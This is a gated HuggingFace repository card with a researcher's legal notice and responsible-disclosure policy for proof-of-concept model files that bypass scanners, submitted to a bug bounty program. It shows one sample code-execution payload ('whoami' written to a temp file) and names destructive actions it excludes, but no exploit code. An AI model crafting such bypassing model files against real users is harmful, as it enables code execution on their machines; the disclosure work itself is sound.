You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/model-cards#model-card-metadata)

Security Research Repository β€” Legal Notice & Responsible Disclosure Policy

Repository Owner: Pavan Chow (@pavanchow)
Last Updated: February 25, 2026
Contact: Submit concerns via HuggingFace community tab


⚠️ Important Notice β€” Read Before Downloading Any File

This repository contains proof-of-concept (PoC) security research files created exclusively for the purpose of responsible vulnerability disclosure through the Huntr.dev bug bounty platform β€” the world's first AI/ML security bug bounty program, operated by ProtectAI.

These files are made publicly accessible solely because Huntr.dev's submission process explicitly requires a public HuggingFace repository so that ProtectAI's automated validation bot (protectai-bot) can independently verify reported vulnerabilities. This is a mandatory step in the responsible disclosure workflow, not a choice made by the researcher.


1. Purpose & Authorization

All security research in this repository was conducted under the following authorized frameworks:

  • Huntr.dev MFV (Model File Vulnerability) Program β€” ProtectAI's official bug bounty program for AI/ML model file vulnerabilities
  • Responsible Disclosure / Coordinated Vulnerability Disclosure (CVD) principles as defined by the U.S. Department of Justice Framework for Vulnerability Disclosure Programs (May 2022)
  • Good Faith Security Research as defined by HackerOne's Gold Standard Safe Harbor (GSSH), aligned with DOJ guidelines, ENISA recommendations, OECD policy papers, and the disclose.io framework

This research is conducted in good faith with the sole intention of improving the security of AI/ML infrastructure for the benefit of the broader community.


2. Legal Framework & Safe Harbor

United States β€” Computer Fraud and Abuse Act (CFAA)

This research is conducted consistent with the U.S. Department of Justice's guidance that good-faith security research constitutes authorized conduct under the CFAA. Specifically:

  • No systems were accessed without authorization
  • All research was performed on locally installed open-source packages (pip-installable libraries) in isolated local environments
  • No production systems, user data, or live infrastructure was accessed or targeted at any time
  • All findings were reported to affected vendors through official channels (Huntr.dev, GitHub Security Advisories, Microsoft MSRC) before any public disclosure

United States β€” Digital Millennium Copyright Act (DMCA)

Proof-of-concept files do not circumvent any technological protection measures. They demonstrate vulnerabilities in publicly available open-source software for the purpose of improving security.

European Union β€” NIS2 Directive & ENISA CVD Guidelines

This research follows the ENISA Coordinated Vulnerability Disclosure framework and is consistent with the EU Agency for Cybersecurity's recommendations for responsible vulnerability disclosure (April 2022).

United Kingdom β€” Computer Misuse Act (CMA)

All research was performed on locally installed software in isolated environments. No unauthorized access to any computer system occurred at any time.

Australia β€” Criminal Code Act 1995 (Part 10.7)

Research was conducted without unauthorized access to any computer or network. All findings are disclosed responsibly through established bug bounty channels.

India β€” Information Technology Act 2000 (Section 43, 66)

All research was performed on locally installed open-source software. No unauthorized access, data interception, or system damage occurred.


3. What These Files Are

File Type Purpose
.pkl, .joblib, .gguf, .onnx Crafted model files that demonstrate specific scanner bypass techniques for responsible disclosure
poc_*.py Python scripts that generate and/or test the malicious model files
*.md Documentation and research notes

All payloads are deliberately non-destructive. Where code execution is demonstrated, the payload is limited to benign commands such as:

  • whoami > /tmp/proof.txt β€” writes the current username to a temp file
  • Triggering a controlled crash or timeout
  • Making a network request to a researcher-controlled endpoint

No destructive commands (rm -rf, data exfiltration, persistence mechanisms, reverse shells, or credential theft) are used in any payload.


4. Limitation of Liability & Disclaimer

BY DOWNLOADING, ACCESSING, OR USING ANY FILE IN THIS REPOSITORY, YOU ACKNOWLEDGE AND AGREE TO THE FOLLOWING:

  1. These files are provided for educational and security research purposes only. The repository owner makes no warranties, express or implied, regarding the safety, fitness for purpose, or completeness of these files.

  2. The repository owner is NOT responsible for any damage, data loss, system compromise, legal consequences, or any other harm resulting from the download, use, misuse, or modification of these files by any third party.

  3. Use of these files against any system, network, or service that you do not own or have explicit written authorization to test is illegal under the CFAA (US), Computer Misuse Act (UK), and equivalent laws in most jurisdictions worldwide. The repository owner expressly disclaims all liability for unauthorized use.

  4. These files are not intended for use in production environments. They are intended exclusively for security researchers testing in isolated, controlled environments.

  5. The repository owner conducted all research on locally installed open-source software in isolated virtual environments on personal hardware. No third-party systems were accessed.

  6. Misuse of these files may constitute criminal offenses including but not limited to violations of the CFAA, DMCA, UK Computer Misuse Act, EU NIS2 Directive, and equivalent national laws. The repository owner bears no responsibility for any criminal or civil consequences arising from third-party misuse.


5. Responsible Disclosure Timeline

All vulnerabilities demonstrated in this repository have been or are in the process of being disclosed responsibly:

  • Huntr.dev MFV Program β€” Submitted through official ProtectAI bug bounty portal. ProtectAI has been granted access to this repository for validation.
  • Vendor notification β€” Affected vendors are notified through official security disclosure channels (GitHub Security Advisories, vendor security email, Microsoft MSRC) in parallel with or prior to Huntr submission.
  • Public disclosure β€” Files in this repository are made public only after following Huntr.dev's required disclosure process. Early public disclosure would violate responsible disclosure principles.

6. Contact & Takedown Requests

If you are a vendor or security team with concerns about any file in this repository:

  1. Open a community discussion on this HuggingFace repository
  2. Contact via Huntr.dev if you are a program participant
  3. File a GitHub Security Advisory if the finding relates to your open-source project

The researcher will respond within 48 hours to legitimate security concerns and will cooperate fully with affected vendors.


7. References & Legal Framework Sources


This policy was drafted in accordance with current best practices in responsible vulnerability disclosure as of February 2026. It is not legal advice. If you have specific legal concerns, consult a qualified attorney specializing in cybersecurity law.

Downloads last month
45
GGUF
Hardware compatibility
Log In to add your hardware

We're not able to determine the quantization variants.

Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support